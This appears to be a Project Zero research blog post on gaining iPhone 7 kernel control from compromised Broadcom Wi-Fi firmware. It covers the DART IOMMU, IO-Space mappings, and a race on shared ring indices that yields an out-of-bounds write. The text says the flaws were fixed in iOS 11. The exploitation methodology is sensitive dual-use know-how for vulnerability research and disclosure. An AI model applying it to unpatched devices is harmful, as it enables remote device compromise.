Over The Air - Vol. 2, Pt. 3: Exploiting The Wi-Fi Stack on Apple Devices

Google Project Zero - Wed, 10/11/2017 - 12:41
Posted by Gal Beniamini, Project Zero
In this blog post we’ll complete our goal of achieving remote kernel code execution on the iPhone 7, by means of Wi-Fi communication alone.
After developing a Wi-Fi firmware exploit in the previous blog post, we are left with the task of using our newly acquired access to gain control over the XNU kernel. To this end, we’ll begin by investigating the isolation mechanisms present on the iPhone. Next, we’ll explore the ways in which the host interacts with the Wi-Fi chip, identify several attack surfaces, and assess their corresponding security properties. Finally, we’ll discover multiple vulnerabilities and proceed to develop a fully-functional reliable exploit for one of them, allowing us to gain control over the host’s kernel.

All the vulnerabilities presented in this blog post (#1, #2, #3, #4, #5, #6, #7) were reported to Apple and subsequently fixed in iOS 11. For an analysis of other affected devices in the Apple ecosystem, see the corresponding security bulletins.Hardware IsolationPCIe DMA
Broadcom’s Wi-Fi chips are present in a wide range of platforms; including mobile phones, IOT devices and Wi-Fi routers. To accommodate for this variance, each chip must be sufficiently configurable, supporting several different interfaces for vendors wishing to integrate the chip into their platform. Indeed, Cypress’s data sheets include a wide range of supported interfaces, including PCIe, SDIO and USB.

While choosing the interface with which to integrate the chip may seem inconsequential, it could have far ranging security implications. Each interface comes with different security guarantees, affecting the degree to which the peripheral may be “isolated” from the host. As we’ve already demonstrated how the Wi-Fi chip’s security can be subverted by remote attackers, it’s clear that providing isolation is crucial in sufficiently safeguarding the host.
From a security perspective, both SDIO and USB (up to 3.1) inherently offer some degree of isolation. SDIO solely enables the serial transfer of information between the host and the target device. Similarly, USB allows the transfer of “packets” between peripherals and the host. Broadly speaking, both interfaces can be thought of as facilitating an explicit communication channel between the host and the peripheral. All the data transported through these interfaces must be explicitly handled by either peer, by inspecting incoming requests and responding accordingly.
PCIe operates using a different paradigm. Instead of communicating with the host using a communication protocol, PCIe allows peripherals to gain Direct Memory Access (DMA) to the host’s memory. Using DMA, peripherals may autonomously prepare data structures within the host’s memory, only signalling the host (via a Message Signalled Interrupt) once there’s processing to be done. Operating in this manner allows the host to conserve computing resources, as opposed to protocols that require processing to transfer data between endpoints or to handle each individual request.
Efficient as this approach may be, it also raises some challenges with regards to isolation. First and foremost, how can we be guaranteed that malicious peripherals won’t abuse this access in order to attack the host? After all, in the presence of full control over the host’s memory, subverting any program running on the host is trivial (for example, peripherals may freely modify a program’s stack, alter function pointers, overwrite code -- all unbeknownst to the host itself).
Luckily, this issue has not gone unaddressed. Sufficient isolation for DMA-capable components can be achieved by partitioning the visible memory space available to the peripheral using a dedicated hardware component - an I/O Memory Management Unit (IOMMU).

IOMMUs facilitate a memory translation service for peripherals, converting their addressable memory ranges (referred to as “IO-Space”) into ranges within the host’s Physical Address Space (PAS). Configuring the IOMMU’s translation tables allows the host to selectively control which portions of its memory are exposed to each peripheral, while safeguarding other ranges against potentially malicious access. Consequently, the bulk of the responsibility for providing sufficient isolation lays with the host.
Returning to the issue at hand, as we are focusing on the Wi-Fi stack present within Apple’s ecosystem, an immediate question springs to mind -- which interfaces does Apple leverage to connect the Wi-Fi chip to the host? Inspecting the Wi-Fi firmware images present in several generations of Apple devices reveals that since the iPhone 6 (included), Apple has opted for PCIe to connect the Wi-Fi chip to the host. Older models, such as the iPhone 5c and 5s, relied on a USB interface instead.

Due to the risks highlighted above, it is crucial that recent iPhones utilise an IOMMU to isolate themselves from potentially malicious PCIe-connected Wi-Fi chips. Indeed, during our previous research into the isolation mechanisms on Android devices, we discovered that no isolation was enforced in two of the most prominent SoCs; Qualcomm’s Snapdragon 810 and Samsung’s Exynos 8890, thereby allowing the Wi-Fi chip to freely access the host’s memory (leading to complete compromise of the device).Inspecting the DMA Engine
To gain some visibility into the isolation capabilities present on the iPhone 7, we’ll begin by exploring the Wi-Fi firmware itself. If a form of isolation is present, the memory ranges used by the Wi-Fi SoC to perform DMA operations and those utilised by the host would be disparate. Conversely, if we happen to find the same ranges of physical addresses, that would hint that no         isolation is taking place.
Luckily, much of the complexity involved in reverse-engineering the firmware’s DMA functionality can be forgone, as Broadcom’s SoftMAC drivers (brcm80211) contain the majority of the code used to interface with the SoC’s DMA engine.
Each DMA engine facilitates transfers in a single direction between two endpoints; one representing the Wi-Fi firmware, and another denoting either an internal core within the Wi-Fi SoC (such as when interacting with the RX or TX FIFOs) or the host itself. As we are interested in inspecting the memory ranges used for transfers originating in the Wi-Fi chip and terminating at the host, we must locate the DMA engine responsible for “dongle-to-host” memory transfers.
As it happens, this task is rather straightforward. Each “dma_info” structure in the firmware (representing a DMA engine) is prefixed by a pointer to a block of DMA-related function pointers stored in the firmware’s RAM. Since the block is placed at a fixed address, we can locate all instances of the structure by searching for the pointer within the firmware’s RAM. For each instance we come across, inspecting the “name” field encoded in the structure should allow us to deduce the identity of the DMA engine in question.

Combining these two tidbits, we can quickly locate each DMA engine in the firmware’s RAM:

The first few instances clearly relate to internal DMA engines. The last instance, labeled “H2D”, indicates “host-to-dongle” memory transfers. Therefore, by elimination, the single entry left must correspond to transfers from the dongle to the host (sneakily left unnamed!).
Having located the engine, all that remains is to dump the RX descriptor ring and extract the addresses to which DMA transfers are performed. Unfortunately, descriptors are rapidly consumed after being inserted into the corresponding rings, replacing their contents with generic placeholder values. Therefore, observing the value of a non-consumed descriptor from a single memory snapshot is tricky. Instead, to extract “fresh” descriptors, we’ll insert a hook on the DMA transfer function, allowing us to dump descriptor addresses before they are inserted into the corresponding rings.
After inserting the hook, we are presented with the following output:

All of the descriptor addresses appear to be 32-bits wide...
How do the above addresses relate to our knowledge of the physical address space on the iPhone 7? The DRAM’s base address in the host’s physical address space is denoted by the “gPhysBase” variable (stored in the kernel’s BSS). Reading this value from our research platform will allow us to determine whether the DMA descriptor addresses correspond to host-side physical ranges:

Ah-ha! The iPhone 7’s DRAM is based at 0x800000000 -- an address beyond a 32-bit range.
Therefore, some form of conversion is taking place between the ranges visible to the Wi-Fi chip (IO-Space) and those corresponding to the host’s physical address space. To locate the root cause of this conversion, let’s shift our attention back towards the host.DART
The host and the Wi-Fi chip communicate with one another using a protocol designed by Broadcom, dubbed “MSGBUF”. Using the protocol, both endpoints are able to transmit and receive control messages, as well as traffic, through a set of “message rings”. Each ring is stored within the host’s memory, but is also made accessible to the firmware through DMA.
Since the rings must be accessible through DMA to the Wi-FI chip, locating the code responsible for their initialisation might shed some light on the process through which their physical addresses are converted to the DMA-accessible addresses we encountered in the firmware’s DMA descriptors.
Reverse-engineering AppleBCMWLANBusInterfacePCIe, we quickly arrive at the function responsible for initialising the IPC structures utilised by the Wi-Fi chip and the host, including the aforementioned rings:
1.  void* init_ring(void* this, uint64_t alignment, IOMapper* mapper, ...) {2.      ...3.      IOOptionBits options = kIOMemoryTypeVirtual | kIODirectionOutIn;4.      IOBufferMemoryDescriptor* desc = 5.          IOBufferMemoryDescriptor::inTaskWithOptions(kernel_task,6.                                                      options,7.                                                      capacity,8.                                                      alignment);                                    9.      ... 10.     IODMACommand* cmd = IODMACommand::withSpecification(11.         IODMACommand::OutputLittle64,  //outSegFunc11.         0,                             //numAddressBits12.         0,                             //maxSegmentSize13.         0,                             //mappingOptions14.         0,                             //maxTransferSize15.         1,                             //alignment16.         mapper,                        //mapper17.         0);                            //refCon18      ...19.     cmd->setMemoryDescriptor(desc, true);20.     ...21. }function 0xFFFFFFF006D1C074
As we can see above, the function utilises I/O Kit APIs to manage and map DMA-capable descriptors.
Upon closer inspection, we can see that IODMACommand defers the actual mapping operations to the provided IOMapper instance (“mapper” in the snippet above). However, as luck would have it, the same “mapper” object is stored within the “PCIe object” we identified in the first part of our research. Therefore, we can proceed to extract the IOMapper instance and begin tracing through its associated code paths.
While the source code for IOMapper is available in the open-sourced portions of XNU, it does not perform any actual mapping operations, but rather delegates them to the “System Mapper” - a globally registered IOMapper instance. Since no concrete subclasses of IOMapper are present in the open-sourced portions of XNU, we can assume that a specialised subclass, performing the actual mapping implementation, exists in one of the proprietary KEXTs.
Indeed, following the extracted IOMapper’s virtual table, we arrive at the IODARTMapper class, under -- it seems a specialised IOMapper is used after all!
Before we continue down the rabbit hole, let’s take a step back and assess the situation. According to Apple’s documentation, DART stands for “Device Address Resolution Table” -- a hardware component integrated into the memory controller, whose purpose it is to provide a separate address space mapping for 32-bit PCI peripherals. DART allows the system to map physical addresses beyond the 32-bit range to peripherals, and to provide fine-grained control over exposed memory ranges to each device. In short, this is non other than a proprietary IOMMU designed by Apple!
Digging deeper into IODARTMapper, we find iovmInsert; the entry point for inserting new IO-Space translations through a mapper. Passing through several more layers of indirection, we finally arrive at an instance of AppleS5L8960XDART.

The latter object originates in a different driver; It appears we’re getting closer to the bare-metal DART implementation for the SoC! Oddly, the driver references “S5L8960X”; the product code for the Apple A7 SoC (used in older iPhones, such as the 5s). Perhaps this artefact suggests that the same DART implementation has been used in prior SoC revisions.
Taking a closer look at AppleS5L8960XDART, we quickly come across a function of particular interest. This function performs many bit shifts and masks, much like we’d expect from translation-table management code. After spending some time familiarising ourselves with the code, we come to the realisation that the function is responsible for populating DART’s translation tables! Here is a high-level representation of the relevant code:
1.  void* create_descriptors(void* this, uint64_t table_index,2.                           uint32_t start_pfn, uint32_t map_size, ...) {3.4.      ... //Validate input arguments, acquire mutex5.      void** dart_table = ((void***)(this + 312))[table_index];6.      uint32_t end_pfn  = start_pfn + map_size;7.8.      //Populating each L0 descriptor in the range9.      uint32_t l0_start_idx = (start_pfn >> 18) & 0x3;10.     uint32_t l0_end_idx   = (end_pfn   >> 18) & 0x3;11.      12.     for (uint32_t l0_idx = l0_start_idx; l0_idx <= l0_end_idx; l0_idx++) {13.      14.         //Creating the L1 table if it doesn’t already exist15.         struct l1_table_t* l1_table = (struct l1_table_t*)(dart_table[l0_idx]);16.         if (!l1_table) {17.             l1_table = allocate_l1_table(this);18.             dart_table[l0_idx] = l1_table;19.             uint64_t table_phys = l1_table->desc->getPhysicalSegment(...);20.             uint64_t l0_desc = ((table_phys >> 12) & 0xFFFFFF) | 0x80000000;21.             OSSynchronizeIO();22.             set_l0_desc(this, table_index, l0_idx, l0_desc);23.         }24.   25.         //Calculating the range of L1 descriptors to populate26.         uint32_t l1_start_idx = (l0_idx == l0_start_idx) ?27.                                      (start_pfn >> 9) & 0x1FF : 0;28.         uint32_t l1_end_idx   = (l0_idx == l0_end_idx) ?29.                                      (end_pfn   >> 9) & 0x1FF : 511;30.31.         //Populating each L1 descriptor in the range32.         for (uint32_t l1_idx = l1_start_idx; l1_idx <= l1_end_idx; l1_idx++) {33.34.             //Creating the L2 table if it doesn’t already exist35.             struct l2_table_t* l2_table;36.             l2_table = (struct l2_table_t*)l1_table->l2_tables[l1_idx];37.             if (!l2_table) {38.                 l2_table = allocate_l1_desc(this);39.                 l1_table->l2_tables[l1_idx] = l2_table;40.                 uint64_t table_phys = l2_table->desc->getPhysicalSegment(...);41.                 l1_table->descriptors[l1_idx] = (table_phys & 0xFFFFFF000) | 3;42.                 OSSynchronizeIO();43.                 ...44.             }45.         }46.     }47.     ... //Release mutex48.  }49.50. struct l1_table_t {51.    IOBufferMemoryDescriptor* desc;      //Descriptor holding L1 table52.    uint64_t* descriptors;               //Kernel VA ptr to L1 descs53.    struct l2_table_t* l2_tables[512];   //L2 descriptors within this table54. };55. 56. struct l2_table_t {57.     IOBufferMemoryDescriptor* desc;     //Descriptor holding L2 table 58.     uint64_t* descriptors;              //Kernel VA ptr to L2 descs59.     uint64_t unknown;60. };function 0xFFFFFFF0065978F0
Alright! Let’s take a moment to unpack the above function.
For starters, it appears that DART utilises a 3-level translation regime. The first level is capable of holding up to four descriptors, while each subsequent level holds 512 descriptors. Since DART uses a 4KB translation granule, we can deduce that, in ascending order, L2 table maps 0x200000 bytes into IO-Space, while L1 tables map up to 0x40000000 bytes.
In addition to the 3-level regime specified above, DART holds four “base descriptors”. Unlike regular descriptors, these are not indexed by bits in the IO-Space address, but are instead referenced explicitly using a parameter provided by the caller.
Drawing on our knowledge of PCIe, we can speculate on the nature of these “base descriptors”. Perhaps each DART can facilitate mappings for several different PCI peripherals on the same bus, where each “base descriptor” corresponds to one such device (based on the “Requester-ID” encoded in the incoming TLP)? Whether or not this is the case, dumping the “base descriptors” in the DART instance corresponding to the Wi-Fi chip reveals that only the first descriptor is populated in our case.
In order to access the DART mappings, two distinct sets of data structures are utilised in tandem; a set of “convenience” structures which map the translation hierarchy into high-level objects within the kernel’s virtual address space, and another set holding the descriptors themselves, which are linked together based on physical addresses. The former set is used by the kernel to conveniently locate and modify DART’s mappings, while the latter is used by DART’s hardware to perform the actual IO-Space translations.

Looking more closely at the descriptors, it appears that the translation format utilised by DART is proprietary, and does not match the formats present in the ARM VMSA (including those utilised by SMMUs). Nonetheless, we can deduce the descriptors’ composition by inspecting the code above, which constructs and populates descriptors across the translation hierarchy.
L0 descriptors encode the physical frame number (using a 4KB translation granule) corresponding to the next level table in the lower bits, and set the 31st bit to indicate a valid entry. L1 and L2 descriptors, on the other hand, use the bottom two bits to indicate validity (setting both bits denotes a valid entry, other combinations result in translation faults), while the top bits store the physical address of either the next translation table or of the 4KB region mapped into IO-Space.

Lastly, we must deduce IO-Space’s base address to complete our analysis of DART’s translation format. Drawing on our previous encounter with IO-Space addresses stored in the DMA descriptors within the Wi-Fi firmware, all the addresses appeared to be based at address 0x80000000. As such, it seems like a fair assumption that IO-Space mappings for the Wi-Fi chip begin at the aforementioned address.
Combining all of the information above, let’s build a module in our research platform to interact with the DART instance. The module will analyse DART’s translation tables, following the hierarchy described above. By analysing the translation tables, we can subsequently hold a mapping between IO-Space addresses and their corresponding physical ranges within the host’s PAS. Furthermore, we can invert the tables in order to produce a PAS to IO-Space mapping. Using these two mappings we can subsequently convert IO-Space addresses to physical addresses, and vice versa.
Finally, in addition to inspecting IO-Space, our DART module also allows us to manipulate IO-Space, by introducing new mappings into IO-Space containing whichever physical address we desire.
At long last, we can test whether our deductions regarding DART’s structure are indeed valid. First, let’s extract the DART instance corresponding to the Wi-Fi chip. Then, using this object, we can proceed to dump the entire mapping between IO-Space addresses and their corresponding physical ranges by following DART’s translation hierarchy:

Great! The first few mappings appear sane -- each IO-Space address is translated into a corresponding physical range well within the host’s PAS. Moreover, we can see that our assumption regarding DART’s translation granule holds, as some mapped physical addresses are within a 4KB range from one another.
To be absolutely certain that our assessment is valid, let’s perform another short experiment. We’ll map-in an unused IO-Space address, pointing it at a physical address corresponding to “spare” data within the kernel’s BSS. Next, using the DMA hook we inserted previously, we’ll direct unconsumed DMA descriptors at the newly mapped IO-Space address. By doing so, subsequent DMA transfers should arrive at our chosen BSS address.
After inserting the hook and monitoring the mapped BSS range (by reading it through the kernel’s VAS), we are presented with the following result:

Awesome! We managed to DMA into an arbitrary physical address within the kernel’s BSS, thus confirming that our understanding of DART is correct.Exploring DART
Using our newly acquired control over IO-Space, we can proceed to conduct a few experiments.
For starters, it would be interesting to see whether the kernel integrity mechanisms present on the iPhone 7 (“KTRR”, previously referred to as “AMCC”), still hold in the presence of malicious DMA attempts from the Wi-Fi chip. To find out, we’ll map each of the protected physical ranges (the kernel’s code segments, read-only segments, etc.) into IO-Space, insert the DMA hook, and observe their contents to see whether they were successfully modified.
Unsurprisingly, each attempt to DMA into a protected region results in a fault being raised, subsequently triggering a kernel panic and crashing the device. Attempting to DMA into the KTRR’s hardware registers storing protected region ranges similarly fails -- once the lockdown occurs, no modification of the registers is permitted.

Continuing our analysis of DART, let’s consider another edge-case scenario: assume two subsequent IO-Space mappings correspond to non-contiguous ranges of physical memory. In such a case, should DMA operations crossing the boundary between the two IO-Space ranges be permitted? If so, should the data be split across the corresponding physical ranges? Or should the transfer instead only utilise the first physical range?
To find out, we’ll conduct another experiment. First, we’ll create two IO-Space mappings pointing at disparate regions in the Kernel’s BSS. Then, using the DMA engine, we’ll initiate a transfer crossing the boundary between the two IO-Space addresses.

Running the above experiment and monitoring the resulting addresses through the kernel’s VAS, we are presented with a positive result -- DART correctly splits the transaction into the two corresponding physical ranges, thus never exceeding any of the mapped-in regions’ bounds.
So far, so good.PCIe Configuration Space
Continuing our investigation of DART, we arrive at another query -- how does DART perform context determination? Namely, how does DART differentiate between the components issuing the memory access requests?
Depending on DART’s architecture, several solutions to this question exist. If each DART is assigned to a single component or a single PCIe bus, no identification is needed, as it can simply funnel all operations from that origin through its translation mechanism. Alternately, if several PCIe components exist on the bus to which DART is assigned, it could utilise the “Requester ID” (RID) field in the PCIe TLP to identify the originating component.
Using the RID for context determination is not risk-free, as malicious PCIe components may attempt to “spoof” the contents of their TLPs. To deal with such scenarios, PCIe introduced Access Control Services (ACS), allowing PCIe switches to perform routing decisions, including disallowing transfer of certain TLPs based on their encompassed IDs. As we are not aware of the PCIe topology on the iPhone, it remains unknown whether such a configuration is needed (or used).
With regards to control over the PCIe TLPs, Broadcom’s Wi-Fi chips expose much of the PCIe Core’s functionality to the Wi-Fi firmware by mapping the core’s registers through a fixed backplane address. Previous Broadcom SoC revisions, which incorporated PCIe Gen 1 cores, allowed access to several “diagnostic” registers (via pcieindaddr / pcieinddata), which govern over the physical (PLP), data link (DLLP) and transport (TLP) layers of PCIe. Regardless, it is unknown whether the this mechanism allows modification of the RID, or indeed whether this form of access is still present in current-gen Broadcom hardware.
Nevertheless, standardised PCIe mechanisms exist which may also affect the RID’s composition. For instance, PCIe 3.0 introduced Alternate Routing-ID Interpretation (ARI), which modifies the encoding of the RID, eliminating the “device” field while expanding the “function” field to 8 bits.

While normally the PCIe Configuration Space is accessed through the host, Broadcom’s Wi-Fi SoC exposes the configuration space within the Wi-Fi SoC, through a pair of backplane registers corresponding to the PCIe Core (configaddr / configdata). Using these registers, the Wi-Fi firmware can not only read the PCIe Configuration Space, but also modify values within it. Like many advanced PCIe features, ARI is exposed in the configuration space through an “extended capability” blob; therefore, if ARI is supported by the PCIe core, we could utilise our access to the configuration space to enable the feature from the Wi-Fi firmware.
To determine whether such capabilities are present in the PCIe core, we’ll produce a dump of the configuration space (using the aforementioned register pair). After doing so, we can simply reorganise the contents in a format legible to lspci, and instruct it to parse the given data, producing a human-readable representation of the features supported by the PCIe core:

Scanning through the above capabilities, it appears that none of the “advanced” PCIe features (such as ARI) are supported by the PCIe core. Exploring IO-Space
While we’ve already determined how DART facilitates the IO-Space mapping for the Wi-Fi chip, we have yet to investigate the contents of the memory exposed through this mechanism. In order to investigate IO-Space’s contents, we’ll use a two-stage translation process; first, we’ll use our DART module to produce a mapping between the IO-Space addresses and their corresponding physical ranges. Once we obtain the mapped physical ranges, all that remains is to map these ranges into the kernel’s VAS, allowing us to subsequently dump their contents using our research platform.
As we know, the mapping from virtual to physical addresses is governed by the MMU’s translation tables. On ARMv8-A platforms (such as the iPhone 7), the ARM Virtual Memory System Architecture (VMSA) specifies the format of the translation tables utilised by the ARM MMU. Like any XNU task, the kernel’s translation tables are accessible through its task_t structure (exported through its data segment). Following the entries in the task structure, we arrive at its pmap, holding the translation tables.
Putting the two together, we can write some code in our research framework to locate the kernel’s task, extract the internal translation tables, and encapsulate the data therein in a module representing an ARMv8 translation table.
Using our new module, we can now perform translations between the virtual addresses in the kernel’s VAS and physical ones. Furthermore, we can invert the translation table, producing a (one-to-many) mapping from physical to virtual addresses. In tandem with our DART module, this allows us to take each IO-Space address, convert it to a physical address, and then use our inverted translation table to convert it back to a virtual address in the kernel’s VAS.
Consequently, we can now iterate over the entire IO-Space exposed to the Wi-Fi chip, extracting the contents of every mapped region:

After producing a copy of the entire contents of IO-Space, we can now comb through it, searching for any “accidental” mappings that might be beneficial for a would-be attacker present on the Wi-Fi chip.
For starters, recall that the kernel protects itself against remote attackers by utilising KASLR. This mitigation introduces a randomised “slide” value, which is added to the kernel’s base loading address (both virtual and physical). Since many exploits rely on the ability to pre-calculate addresses within the kernel’s VAS, such a mitigation may slow down attackers, or hinder the reliability of exploits targeting the kernel.
However, as the same “slide” value is applied globally, it is often the case that a single “leaked” kernel VAS address results in a KASLR bypass (allowing attackers to deduce the slide’s value). Therefore, if any kernel virtual address is accidentally leaked in an IO-Space mapped page, the Wi-Fi chip may be able to similarly subvert KASLR.
Apart from the potential implications regarding KASLR, the presence of any kernel VAS pointer in IO-Space would be worrisome, as the pointer might be utilised by kernel code. Allowing a malicious Wi-Fi chip to corrupt its value may subsequently affect the kernel’s behaviour (perhaps even resulting in code execution).
To find out whether any kernel pointers are exposed through IO-Space, let’s scan through the extracted IO-Space pages, searching for 64-bit words corresponding to addresses within the kernel’s VAS. After going through every single page, we are greeted with a negative result; we can find no kernel VAS pointers in any IO-Space mapped page!
With a cursory investigation of IO-Space out of the way, we can now dig deeper, attempting to gain a better understanding of the IO-mapped contents. To this end, we’ll combine several approaches:
  1. Inspect each page’s contents to look for hints regarding its role
  2. Locate the kernel code responsible for interacting with the same IO-Space range
  3. Check the IO-Space address against posted addresses in the Wi-Fi firmware
  4. Use the Android driver as reference for any “strange” unidentified constructs

After performing the above steps, we are finally able to piece together a complete mapping of IO-Space (thus also concluding that no “accidental” mappings are present). It is important to note that since IO-Space is not subject to randomisation, the IO addresses are constant, and are not affected by the KASLR slide.
Searching For Vulnerabilities
Having explored the aspects relating to DART, IO-Space mappings, and low-level components, let’s proceed to inspect the more traditional attack surfaces exposed by the host.
Recall that the Wi-Fi chip and the host communicate with one another through a series of “rings”, mapped into IO-Space. Each ring facilitates the transfer of information in a single direction; either from the device to the host (D2H), or vice versa (H2D).
Among the messages transferred through message rings, “Control Messages” represent a rather abundant attack surface. These message are used to instruct the firmware to perform complex state-changing operations, such as creating additional message rings, deleting them, and even transporting high-level requests (ioctls) to be processed by the firmware.
Due to their complexity, control messages rely on a bidirectional communication channel; the “Control Submit” ring (H2D) allows the host to submit the requests to the device, while the “Control Complete” ring (D2H) is used by the device to return the results back to the host.
After committing messages to the D2H rings, the Wi-Fi firmware signals the host by writing to a “MailBox” register and triggering an MSI interrupt. This interrupt is subsequently handled by the host, which inspects the MailBox register, and notifies the corresponding (D2H) rings that data may be available for processing.

Tracing through the above flow, we reach the handler function for processing incoming control messages within the host. To assist in reverse-engineering these messages, we’ll utilise Broadcom’s Android driver (bcmdhd), which contains the definitions for the control structures, as well as the message codes corresponding to each request.
The encapsulating handler simply reads the “message type” field, and proceeds to delegate the message’s processing to a dedicated handler -- one per message type. Going over each of the handlers, we stumble across a memory corruption bug triggerable by the firmware. Incidentally, the bug was present in a handler for a message type which isn’t available in the Android driver.
Moving on, let’s set our sights on slightly higher targets in the protocol stack. Recall that control rings are also used to carry high-level control requests from the host to the firmware, dubbed “ioctls”. Each ioctl allows the host to either set a firmware-specific configuration value, or to retrieve its current value. As this channel is quite versatile, much of the high-level interaction between the host and the firmware is enacted through this channel, including retrieving the current channel, setting network configurations, and more.
However, like any other signal originating from the device, it is important to remember that “ioctls” can be co-opted by malicious Wi-Fi firmware. After all, an attacker controlling the Wi-Fi firmware can simply hook the “ioctl” handling function, thereby allowing full control over the contents transmitted back to the host.
Reverse-engineering the high-level driver, AppleBCMWLANCore, we quickly identify the entry point responsible for issuing ioctl requests from the host to the Wi-Fi firmware. Cross referencing the function, we find nearly 500 call sites, several of which act as wrappers for common functionality, thus revealing even more originating call sites. After going over each of the aforementioned sites, we discover several memory corruptions in their corresponding handlers.
Lastly, there’s one more communication channel to consider -- Broadcom allows the in-band transmission of “event packets” from the Wi-Fi firmware to the host. These frames, denoted by a unique EtherType (0x886C), carry unsolicited events from the firmware, requiring special handling by the host. Tracing through the host’s RX path brings us to the entry point for handling such frames:

Once again, going over each handler in the above function (while using the Android driver to assist our understanding of the corresponding event codes and data structures), we discover two more vulnerabilities.Better VulnerabilitiesData Races?
While the vulnerabilities we just discovered allow us to trigger several forms of memory corruptions in the host (OOB writes, heap overflows), and even to leak constrained data from the host to the firmware, reliably exploiting any of them remains rather challenging.
For starters, the Wi-Fi chip has no visibility into the host’s memory (apart from the IO-Space mapped regions), and relatively little control over objects allocated within the kernel. Therefore, grooming the kernel’s memory in order to successfully launch a heap memory corruption attack would require significant effort. What’s more, this challenge is compounded by the presence of KASLR, preventing us from accurately locating the kernel’s data structures (barring any information disclosure).
Nonetheless, perhaps we can identify better primitives by digging deeper!
So far, we’ve only considered the contents of the data transferred between the host and the firmware. Effectively, we were thinking of the firmware and the host as two distinct entities, communicating with one another through an isolated communication channel. In fact, nothing can be further from the truth -- the two endpoints share a PCIe interface, allowing the firmware to perform DMA accesses at will to any IO-Space address.
One of the major risks when using a shared memory interface is the matter of timing. While the host and firmware normally synchronise their operations to ensure that no data races occur, attackers controlling the Wi-Fi firmware are bound by no such agreement. Using our control over the Wi-Fi chip, we can intentionally modify data structures within IO-Space as they are being accessed by the host. Doing so might allow us to introduce race conditions, such as TOCTTOUs, creating vulnerable conditions in otherwise safe code (under normal assumptions).
The first target for such modification are the control messages we inspected earlier on. Inspecting the control ring handler in the host, it appears that the messages are read directly from the IO-Space mapped buffer, raising the possibility for data races in their processing. Nonetheless, going over the relevant code paths, we find no security-relevant races.
What about the second control channel we reviewed -- event packets? Perhaps we could modify a packet’s contents while it is being processed, thereby affecting the kernel’s behaviour? Once again, the answer is negative; each transferred packet is first copied from its IO-Space mapped buffer to a kernel-resident mbuf before subsequently passing it on for processing, thus eliminating the possibility of firmware-induced races.Message Rings, Revisited
So far, we’ve inspected the high-level functionality provided by message rings, namely, the control messages transported therein. However, we’ve neglected several aspects of their operation. One implementation detail of particular note is the method through which rings allow the endpoints to synchronise their accesses to the ring.
To allow concurrent accesses by both the ring’s consumer and its corresponding producer, each ring is assigned a pair of indices: a read index specifying the location up to which the consumer has read the messages, and a write index specifying the location at which the next message will be submitted by the producer. As their name implies, each ring forms a circular buffer -- upon arriving at the last ring index, the indices simply wrap around, returning back to the ring’s base.

Since both endpoints must be aware of the ring indices to successfully coordinate their access, a mechanism must exist through which the indices may be shared between the two. In Apple’s case, this is achieved by mapping all the indices into IO-Space mapped buffers.

While mapping the indices into IO-Space is a convenient way to share their values, it is not risk-free. For starters, if all the above indices are mapped into IO-Space, a malicious Wi-Fi chip may not only utilise DMA access to read them, but may also be able to modify them.
This form of access is excessive -- after all, the device need only update the read indices for H2D rings, and the write indices for D2H rings. The remaining indices should, at most, be read by the device. However, as DART’s implementation is proprietary, it is unknown whether it can facilitate read-only mappings. Consequently, all of the above indices are mapped into IO-Space as both readable and writable, thus allowing a malicious Wi-Fi chip to freely alter their values.
This IO-Space-based index sharing mechanism raises an important question; what if a Wi-Fi chip were to maliciously modify a ring’s indices while the ring is being processed by the host? Would doing so introduce a race condition? To find out, let’s take a look at the function through which the host submits messages into H2D rings:
1.  void* AppleBCMWLANPCIeSubmissionRing::workloopSubmitTx(uint32_t* p_read_index,2.                                                         uint32_t* p_write_index) {3.4.      //Getting the write index from the IO-Space mapped buffer (!)5.      uint32_t write_index = *(this->write_index_ptr);6.      7.      //Iterating until there are no more events to process
8.      while (this->getRemainingEvents(p_read_index, p_write_index)) {9.10.         //Calculate the next insertion address based on the write index
11.         void* ring_addr = this->ring_base + this->item_size * write_index;12.         uint32_t max_events = this->calculateRemainingWriteSpace();13.14          //Writing the current events to the ring
15.         uint32_t num_written = this->submit_func(..., ring_addr, max_events);
16.         if (!num_written)17.             break; //No more events to process18.19.         //Update the write index20.         write_index += num_written;21.         if (write_index >= this->max_index) {22.             write_index = 0; //Wrap around23. 24.         //Commit the new index to the IO-Space mapped buffer (!)
25.         *(this->write_index_ptr) = write_index;
26.     }
27.     ...28. }
29. 30. class AppleBCMWLANPCIeSubmissionRing {31.     ...32.     uint32    max_index;          //The maximal ring index               (off 88)33.     uint32    item_size;          //The size of each item                (off 92)33.     uint32_t* read_index_ptr;     //IO-Space mapped read index pointer   (off 174)34.     uint32_t* write_index_ptr;    //IO-Space mapped write index pointer  (off 184)35.     void*     ring_base;          //IO-Space mapped ring base address    (off 248)36. }function 0xFFFFFFF006D36D04
Alright! Looking at the above function immediately raises some red flags…
The function appears to read values from IO-Space mapped buffers in several different locations, seemingly making no effort to coordinate the read values. This kind of pattern opens the door to the possibility of race conditions induced by the firmware.
Let’s focus on the “write index” utilised by the function. At first, the index is fetched by reading its value directly from the IO-Space mapped buffer (line 5). This same value is then used to derive the location to which the next ring item will be written (line 11). Crucially, however, the value is not used in any shape or form by the surrounding verifications utilised by the function to decide whether the current ring indices are valid (lines 8, 12).
Therefore, the verification methods must re-fetch the indices’ values, introducing a possible discrepancy between the value used during verification, and the one used to place the next item.
To exploit the above issue, an attacker controlling the Wi-Fi chip can DMA into the ring indices in order to introduce one value for the ring address calculation (line 5), while quickly switching the index to a different, valid value, for the remaining validations (lines 8, 12). If the above race is executed successfully, the following H2D item will be submitted by the host at an arbitrary attacker-controller offset from the ring’s base, triggering an out-of-bounds write!
Removing The Race Condition
While the above primitive is no doubt useful, it has one inherent downside -- performing a data race from an external vantage point may be a difficult feat, especially considering the platform we’re executing on (an ARM Cortex R) is significantly slower than the targeted one (a full-blown application processor).
Perhaps by gaining a better understanding of the primitive, we can deal with these limitations. To this end, let’s take a closer look at the validation performed by the submission function:
1.  uint32_t AppleBCMWLANPCIeSubmissionRing::calculateRemainingWriteSpace() {
3.      uint32_t read_index, write_index;
4.      this->getIndices(&read_index, &write_index);5.6.      //Did the ring wrap around?7.      if (read_index > write_index)
8.          return read_index - (write_index + 1); 9.      else10.         return this->max_index - write_index + (read_index ? 0 : -1);
11. }12.13. void AppleBCMWLANPCIeSubmissionRing::getIndices(uint32_t* rindex,14.                                                 uint32_t* windex) {15.     uint32_t read_index = *(this->read_index_ptr);
16.     uint32_t write_index = *(this->write_index_ptr);
17.     if (read_index >= 0x10000 || write_index >= 0x10000)
18.         panic(...);
19.     *rindex = read_index;
20.     *windex = write_index;
21. }
Ah-ha! Looking at the code above, we can identify yet another fault.
